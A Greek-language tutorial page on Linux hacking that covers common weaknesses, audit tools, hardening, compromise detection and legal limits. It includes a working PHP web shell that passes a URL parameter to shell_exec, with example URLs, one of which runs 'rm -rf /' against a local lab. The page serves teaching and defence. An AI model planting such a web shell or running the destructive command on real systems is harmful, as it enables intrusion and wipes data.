Οδηγός για το Linux Hacking: Ubuntu Εντολές και Εργαλεία
⚡ Έξυπνη Σύνοψη
Το hacking σε Linux είναι η πρακτική της εύρεσης και εκμετάλλευσης αδυναμιών σε συστήματα Linux και αυτή η σελίδα εξηγεί τα τρωτά σημεία στα οποία στοχεύουν οι εισβολείς, τα εργαλεία ελέγχου που εμπλέκονται και τα στοιχεία ελέγχου που διατηρούν έναν διακομιστή προστατευμένο.
Το Linux είναι το πιο ευρέως χρησιμοποιούμενο λειτουργικό σύστημα για διακομιστές, ειδικά για διακομιστές ιστού. Είναι ανοιχτού κώδικα, που σημαίνει ότι ο καθένας μπορεί να διαβάσει τον πηγαίο κώδικα. Αυτή η διαφάνεια έχει και τις δύο πλευρές: οι συντηρητές το χρησιμοποιούν για να βρίσκουν και να διορθώνουν γρήγορα ελαττώματα, ενώ οι εισβολείς μελετούν τον ίδιο κώδικα αναζητώντας αδυναμίες για να τις εκμεταλλευτούν. Το hacking στο Linux είναι η πρακτική της εκμετάλλευσης αυτών των αδυναμιών για την απόκτηση μη εξουσιοδοτημένης πρόσβασης σε ένα σύστημα.
Οι παρακάτω ενότητες καλύπτουν τι είναι το Linux, τα τρωτά σημεία ασφαλείας που το επηρεάζουν, μια πρακτική ματιά στο hacking με Ubuntuκαι τα αντίμετρα που μπορείτε να εφαρμόσετε.
Γρήγορη σημείωση σε Linux
Το Linux είναι ένα λειτουργικό σύστημα ανοιχτού κώδικα. Πολλές διανομές βασίζονται σε αυτό, συμπεριλαμβανομένων των Red Hat Enterprise Linux, Fedora, Debian και UbuntuΕπειδή ο πηγαίος κώδικας είναι δημοσιευμένος, οι ερευνητές, οι προμηθευτές και οι εισβολείς μπορούν όλοι να τον επιθεωρήσουν. Οι εισβολείς χρησιμοποιούν αυτήν την πρόσβαση για να αναζητήσουν εκμεταλλεύσιμα ελαττώματα, ενώ η ίδια ορατότητα επιτρέπει στους συντηρητές να στέλνουν διορθώσεις πιο γρήγορα από ό,τι συνήθως καταφέρνουν οι κλειστές πλατφόρμες. Το Linux λειτουργεί ως λειτουργικό σύστημα διακομιστή, επιτραπέζιου υπολογιστή, tablet ή κινητής συσκευής.
Τα προγράμματα Linux μπορούν να λειτουργήσουν μέσω γραφικής διεπαφής ή από τη γραμμή εντολών. Η εργασία μέσω γραμμής εντολών είναι ταχύτερη και ακριβέστερη από το κλικ μέσω ενός γραφικού περιβάλλοντος χρήστη (GUI), γι' αυτό και οι δοκιμαστές ασφαλείας που εργάζονται σε διανομές όπως Kali Linux περνούν σχεδόν όλο τον χρόνο τους σε ένα τερματικό. Η γνώση των βασικών εντολών αποτελεί επομένως πρακτική προϋπόθεση.
Ανατρέξτε σε αυτό Εκμάθηση Linux για τα βασικά, και για το Kali Linux φροντιστήριο για την διανομή που επικεντρώνεται στην ασφάλεια και βασίζεται σε αυτά.
Συνηθισμένα τρωτά σημεία ασφαλείας Linux και φορείς επιθέσεων
Οι επιθέσεις σε Linux σπάνια βασίζονται σε εξωτικά exploits. Η τηλεμετρία που δημοσιεύτηκε κατά τη διάρκεια του 2025 και του 2026 δείχνει ότι οι περισσότερες παραβιάσεις... tracΕπιστρέφουμε σε ένα μικρό σύνολο επαναλαμβανόμενων αδυναμιών και η γνώση τους σας λέει πού να αφιερώσετε πρώτα την αμυντική σας προσπάθεια.
- Αδύναμα ή επαναχρησιμοποιημένα διαπιστευτήρια SSH — Οι προσπάθειες ωμής βίας και παραποίησης διαπιστευτηρίων κατά του SSH που συνδέεται στο διαδίκτυο ευθύνονται για τη μεγάλη πλειοψηφία της εχθρικής δραστηριότητας που παρατηρείται σε τερματικά Linux.
- Ελαττώματα πυρήνα και πακέτων χωρίς ενημέρωση κώδικα — η ομάδα πυρήνα Linux έγινε Αρχή Αρίθμησης CVE το 2024 και τα αναφερόμενα CVE πυρήνα αυξήθηκαν από περίπου 290 το 2023 σε περισσότερα από 3,500 το επόμενο έτος, επομένως οι εκκρεμότητες ενημερώσεων κώδικα συσσωρεύονται γρήγορα.
- Λανθασμένη διαμόρφωση — οι προεπιλεγμένοι λογαριασμοί, οι περιττοί δαίμονες, τα αρχεία που μπορούν να εγγραφούν στον κόσμο και οι επιτρεπτικοί κανόνες sudo παραχωρούν προνόμια για τα οποία δεν χρειαζόταν εκμετάλλευση.
- Ευάλωτες εφαρμογές ιστού — ελαττώματα όπως SQL injection και η δημιουργία σεναρίων μεταξύ ιστοτόπων επιτρέπει σε έναν εισβολέα να φτάσει στον διακομιστή μέσω της εφαρμογής και όχι μέσω του λειτουργικού συστήματος. Τα κελύφη ιστού είναι το πιο συνηθισμένο κακόβουλο αντικείμενο που βρίσκεται σε παραβιασμένους διακομιστές Linux.
- Σφάλματα κλιμάκωσης προνομίων — τοπικά ελαττώματα που μετατρέπουν έναν περιορισμένο λογαριασμό σε root. Μερικά έχουν επιβιώσει απαρατήρητα στον πυρήνα για περισσότερο από μια δεκαετία πριν από την αποκάλυψή τους.
- Κίνδυνος εφοδιαστικής αλυσίδας και εξάρτησης — τα πακέτα τρίτων, οι βιβλιοθήκες γλωσσών και οι εικόνες κοντέινερ εισάγουν κώδικα που δεν έχει ελέγξει κανείς στην ομάδα λειτουργίας.
Κανένα από αυτά δεν απαιτεί έναν εισβολέα για να νικήσει το ίδιο το Linux. Οι αναλύσεις των εισβολών του 2025 διαπίστωσαν ότι περίπου τέσσερις στις πέντε δεν αφορούσαν καθόλου κακόβουλο λογισμικό, βασιζόμενες αντ' αυτού σε λανθασμένη διαμόρφωση και κλεμμένα διαπιστευτήρια.
Linux Hacking Tools
Οι υπεύθυνοι δοκιμών ασφαλείας και οι διαχειριστές συστημάτων χρησιμοποιούν τους ίδιους σαρωτές: τη μία πλευρά για να εντοπίσει αδυναμίες πριν τις εντοπίσει ένας εισβολέας, και την άλλη για να επιβεβαιώσει ότι οι διορθώσεις ισχύουν. Τα παρακάτω εργαλεία είναι αυτά που χρησιμοποιούνται συχνότερα για τον έλεγχο ενός κεντρικού υπολογιστή Linux.
| Εργαλείο | Χαρακτηριστικά | Άδεια | Τυπική χρήση σε Linux |
| Nessus | Σαρωτής ευπάθειας | Εμπορικά | Σαρώνει τις ρυθμίσεις διαμόρφωσης, τις ελλείπουσες ενημερώσεις κώδικα και τις δικτυωμένες υπηρεσίες σε μικτά περιβάλλοντα. |
| Nmap | Σάρωση δικτύου και θυρών | Ανοιχτή πηγή | Προσδιορίζει τους κεντρικούς υπολογιστές που εκτελούνται σε έναν διακομιστή, τις υπηρεσίες που εκθέτουν και ποιες θύρες είναι ανοιχτές. |
| Lynis | Έλεγχος και ενίσχυση κεντρικού υπολογιστή | Ανοιχτή πηγή | Ελέγχει ένα λειτουργικό σύστημα σε σχέση με τα κριτήρια βελτίωσης της ποιότητας λειτουργίας και αναφέρει συγκεκριμένα βήματα αποκατάστασης. |
| OpenVAS | Σαρωτής ευπάθειας | Ανοιχτή πηγή | Σάρωση ευπαθειών δικτύου, που συντηρείται από την Greenbone ως μέρος της Έκδοσης Κοινότητας. |
Η λίστα δεν είναι εξαντλητική· δίνει μια ιδέα για τα εργαλεία που είναι διαθέσιμα για τον έλεγχο. Ubuntu και άλλα συστήματα Linux. Οι παλαιότεροι οδηγοί εξακολουθούν να προτείνουν το SARA, το Security Auditor's Research Assistant, αλλά η τελική του κυκλοφορία χρονολογείται από το 2009 και ο ιστότοπος του έργου του είναι εκτός σύνδεσης, επομένως ο Lynis και OpenVAS είναι οι διατηρούμενες εναλλακτικές λύσεις.
Δραστηριότητα Hacking: Hack a Ubuntu Σύστημα Linux με χρήση PHP
Σε αυτό το πρακτικό σενάριο, θα εξετάσουμε πώς μπορεί να προσεγγιστεί ένας κεντρικός υπολογιστής Linux μέσω μιας διαδικτυακής εφαρμογής, χρησιμοποιώντας ως παράδειγμα την PHP. Κανένα ζωντανό θύμα δεν στοχεύεται. Αν θέλετε να το δοκιμάσετε, εγκαταστήστε το LAMPP, την έκδοση Linux του XAMPP, στον δικό σας υπολογιστή.
PHP συνοδεύεται από δύο συναρτήσεις που μπορούν να χρησιμοποιηθούν για την εκτέλεση εντολών λειτουργικού συστήματος: exec() και shell_exec(). Η συνάρτηση exec() επιστρέφει την τελευταία γραμμή της εξόδου της εντολής, ενώ η shell_exec() επιστρέφει ολόκληρο το αποτέλεσμα της εντολής ως συμβολοσειρά.
Για σκοπούς επίδειξης, ας υποθέσουμε ότι ένας εισβολέας καταφέρνει να ανεβάσει το ακόλουθο αρχείο σε έναν διακομιστή ιστού.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
ΕΔΩ,
Το παραπάνω σενάριο λαμβάνει την εντολή από τη μεταβλητή GET με όνομα cmd. Η εντολή εκτελείται χρησιμοποιώντας την συνάρτηση shell_exec() και το αποτέλεσμα επιστρέφεται στο πρόγραμμα περιήγησης.
Ο παραπάνω κώδικας μπορεί να αξιοποιηθεί χρησιμοποιώντας τα παρακάτω URL
http://localhost/cp/konsole.php?cmd=ls%20-l
ΕΔΩ,
- Η εντολή “…konsole.php?cmd=ls%20-l” αντιστοιχίζει την τιμή ls –l στη μεταβλητή cmd.
Η εντολή στο Ubuntu επομένως, ο διακομιστής εκτελείται ως
shell_exec('ls -l') ;
Η εκτέλεση του παραπάνω κώδικα σε έναν διακομιστή ιστού δίνει ένα αποτέλεσμα παρόμοιο με το ακόλουθο.
Η έξοδος απλώς εμφανίζει τα αρχεία στον τρέχοντα κατάλογο και τα δικαιώματά τους.
Τώρα ας υποθέσουμε ότι ο εισβολέας δίνει την ακόλουθη εντολή.
rm -rf /
ΕΔΩ,
- Η εντολή "rm" καταργεί αρχεία.
- Η εντολή "rf" εκτελεί την εντολή rm σε αναδρομική λειτουργία, διαγράφοντας όλους τους φακέλους και τα αρχεία.
- Το "/" δίνει εντολή στην εντολή να ξεκινήσει η διαγραφή από τον ριζικό κατάλογο.
Η επίθεση URL θα έμοιαζε κάπως έτσι
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Μία μη επικυρωμένη παράμετρος είναι επομένως αρκετή για να παραχωρήσει σε έναν εισβολέα όποια προνόμια κατέχει ο λογαριασμός του διακομιστή ιστού. Οι δύο ενότητες που ακολουθούν υπάρχουν για να το αποτρέψουν αυτό και να το εντοπίσουν όταν η πρόληψη αποτύχει.
Πώς να αποτρέψετε τα hacking στο Linux
Το hacking σε Linux εκμεταλλεύεται τα τρωτά σημεία του λειτουργικού συστήματος και του λογισμικού που εκτελείται πάνω από αυτό. Ένας οργανισμός μπορεί να υιοθετήσει τα ακόλουθα στοιχεία ελέγχου, εφαρμοζόμενα μαζί, για να κλείσει τα περισσότερα από τα ανοίγματα που περιγράφονται παραπάνω.
- Διαχείριση διακυμάνσεων — οι ενημερώσεις κώδικα διορθώνουν τα σφάλματα που εκμεταλλεύονται οι εισβολείς για να θέσουν σε κίνδυνο ένα σύστημα. Μια καθορισμένη πολιτική διασφαλίζει ότι οι σχετικές ενημερώσεις εφαρμόζονται άμεσα και όχι όποτε κάποιος το θυμάται.
- Σωστή διαμόρφωση λειτουργικού συστήματος — απενεργοποιήστε τους ανενεργούς λογαριασμούς χρηστών και τους περιττούς δαίμονες. Αλλάξτε τις προεπιλεγμένες ρυθμίσεις, συμπεριλαμβανομένων των προεπιλεγμένων ονομάτων χρήστη, των κοινόχρηστων κωδικών πρόσβασης εφαρμογών και των προεπιλεγμένων αριθμών θύρας.
- Σκλήρυνση SSH — απενεργοποιήστε την επαλήθευση σύνδεσης και κωδικού πρόσβασης root, επιτρέψτε μόνο χρήστες ή ομάδες με όνομα χρήστη και περιορίστε τις επαναλήψεις ελέγχου ταυτότητας. Αυτό κλείνει το σημείο εισόδου που έχει δεχθεί τις περισσότερες επιθέσεις στο Linux.
- Ελάχιστο προνόμιο — δώστε στους λογαριασμούς και τις υπηρεσίες μόνο τα δικαιώματα που χρειάζονται και περιορίστε το sudo σε συγκεκριμένες εντολές αντί για γενική πρόσβαση διαχειριστή.
- Υποχρεωτικός έλεγχος πρόσβασης — διατηρήστε το SELinux (οικογένεια Red Hat) ή το AppArmor (Debian και Ubuntu) σε λειτουργία επιβολής, έτσι ώστε μια παραβιασμένη υπηρεσία να μην μπορεί να φτάσει στο υπόλοιπο σύστημα.
- Επικύρωση εισόδου — η παραπάνω επίδειξη λειτουργεί μόνο επειδή τα δεδομένα αιτήματος φτάνουν σε μια συνάρτηση shell. Ποτέ μην μεταβιβάζετε δεδομένα χρήστη σε exec() ή shell_exec().
- Τείχη προστασίας και τμηματοποίηση — να εκθέτουν μόνο τις θύρες που πραγματικά χρειάζεται μια υπηρεσία, χρησιμοποιώντας ένα firewall και τμηματοποίηση δικτύου για να περιοριστεί η εμβέλεια ενός παραβιασμένου κεντρικού υπολογιστή.
- Συστήματα ανίχνευσης εισβολών — τέτοια εργαλεία μπορούν να χρησιμοποιηθούν για την ανίχνευση μη εξουσιοδοτημένης πρόσβασης στο σύστημα και ορισμένα μπορούν επίσης να εμποδίσουν την προσπάθεια.
- Δοκιμασμένα αντίγραφα ασφαλείας — Τα αντίγραφα ασφαλείας εκτός σύνδεσης, με δυνατότητα επαναφοράς, μετατρέπουν μια καταστροφική εντολή όπως αυτή που αναφέρεται παραπάνω σε διακοπή λειτουργίας αντί για μόνιμη απώλεια.
Πώς να εντοπίσετε ένα παραβιασμένο σύστημα Linux
Η πρόληψη τελικά αποτυγχάνει, επομένως το δεύτερο ερώτημα είναι πόσο γρήγορα θα το παρατηρήσετε. Η ανίχνευση σε Linux εξαρτάται από τη συλλογή των κατάλληλων αποδεικτικών στοιχείων πριν από ένα περιστατικό, όχι μετά από ένα.
- Καταγραφή ελέγχου — το πλαίσιο ελέγχου πυρήνα, auditedd, η χρήση δικαιωμάτων εγγραφής, η πρόσβαση σε αρχεία και οι κλήσεις συστήματος σε μορφή που μια παραβιασμένη διεργασία δεν μπορεί να ξαναγράψει αθόρυβα. Προωθήστε αυτά τα αρχεία καταγραφής από τον κεντρικό υπολογιστή σε έναν κεντρικό συλλέκτη.
- Αρχεία καταγραφής ελέγχου ταυτότητας — μια σειρά από αποτυχίες ακολουθούμενη από μία μόνο επιτυχία στο /var/log/auth.log ή στο /var/log/secure είναι η κλασική υπογραφή brute-force.
- Μη αναμενόμενες διεργασίες και συνδέσεις — μια υπηρεσία ακρόασης ή μια εξερχόμενη σύνδεση για την οποία κανείς δεν μπορεί να εξηγήσει χρήζει άμεσης διερεύνησης.
- Παρακολούθηση ακεραιότητας αρχείων — εργαλεία που κατακερματίζουν τα δυαδικά αρχεία συστήματος και τα αρχεία διαμόρφωσης επισημαίνουν αλλαγές σε αρχεία που δεν πρέπει ποτέ να αλλάξουν.
- Προγραμματισμένες εργασίες και στοιχεία εκκίνησης — η επιμονή συνήθως καταλήγει σε εργασίες cron, μονάδες systemd ή σενάρια προφίλ shell.
- Νέοι ή τροποποιημένοι λογαριασμοί — αναζητήστε άγνωστους χρήστες, οποιονδήποτε δεύτερο λογαριασμό με UID 0 και κλειδιά SSH που δεν έχουν προστεθεί από κανέναν.
- Κατάλογοι διακομιστή ιστού — επειδή τα web shells είναι το πιο συνηθισμένο κακόβουλο αρχείο που βρίσκεται σε διακομιστές Linux, τα μη αναμενόμενα αρχεία script κάτω από μια web root χρήζουν ιδιαίτερης προσοχής.
- Προγραμματισμένοι έλεγχοι — εκτελέστε ένα εργαλείο ελέγχου κεντρικού υπολογιστή, όπως το Lynis, βάσει χρονοδιαγράμματος και αντιμετωπίστε κάθε αναφορά ως λίστα εργασιών και όχι ως μεμονωμένη άσκηση.
Εάν βρείτε στοιχεία για παραβίαση, απομονώστε τον κεντρικό υπολογιστή, διατηρήστε τα αρχεία καταγραφής και μια εικόνα δίσκου πριν αλλάξετε οτιδήποτε και δημιουργήστε ξανά από γνωστά καλά μέσα αντί να προσπαθήσετε να καθαρίσετε ένα σύστημα που εκτελείται. Η πλευρά της διαχείρισης στοιχείων αυτής της εργασίας καλύπτεται στο ψηφιακή εγκληματολογία.
Νομικά και Ηθικά Όρια του Linux Hacking
Κάθε τεχνική σε αυτήν τη σελίδα είναι νόμιμη για εφαρμογή σε συστήματα που σας ανήκουν ή έχετε γραπτή άδεια να δοκιμάσετε και είναι παράνομη σχεδόν οπουδήποτε αλλού. Η παραπάνω άσκηση λειτουργεί σκόπιμα σε μια τοπική εγκατάσταση ακριβώς για αυτόν τον λόγο.
- Γραπτή εξουσιοδότηση — ένα υπογεγραμμένο πεδίο εφαρμογής, ένα συμφωνημένο χρονικό παράθυρο δοκιμής και μια επώνυμη επαφή είναι αυτά που διαχωρίζουν μια δοκιμή διείσδυσης από ένα αδίκημα. Η προφορική έγκριση δεν αρκεί.
- Μείνετε εντός εμβέλειας — οι κεντρικοί υπολογιστές, τα εύρη διευθύνσεων και οι τεχνικές που δεν αναφέρονται δεν επιτρέπονται, ακόμη και όταν είναι προσβάσιμα.
- Χειριστείτε τα δεδομένα με προσοχή — τα στοιχεία που συλλέγονται κατά τη διάρκεια μιας δοκιμής εξακολουθούν να περιέχουν πραγματικά προσωπικά δεδομένα και πρέπει να αποθηκεύονται με ασφάλεια και να καταστρέφονται στη συνέχεια.
- Αναφέρετε υπεύθυνα — κοινοποιήστε τα ευρήματα στον κάτοχο και αφήστε χρόνο για διόρθωση πριν δημοσιεύσετε οτιδήποτε.
Η νομική έκθεση είναι πραγματική: η μη εξουσιοδοτημένη πρόσβαση σε ένα σύστημα υπολογιστή αποτελεί ποινικό αδίκημα βάσει νόμων όπως ο Νόμος περί Απάτης και Κατάχρησης Υπολογιστών των ΗΠΑ και ο Νόμος περί Κατάχρησης Υπολογιστών του Ηνωμένου Βασιλείου. Εάν θέλετε να χτίσετε μια καριέρα με αυτές τις δεξιότητες, ακολουθήστε μια αναγνωρισμένη οδό — μια πιστοποίηση ασφαλείας συν ένα εργαστήριο που σας ανήκει, αντί για τον διακομιστή κάποιου άλλου.


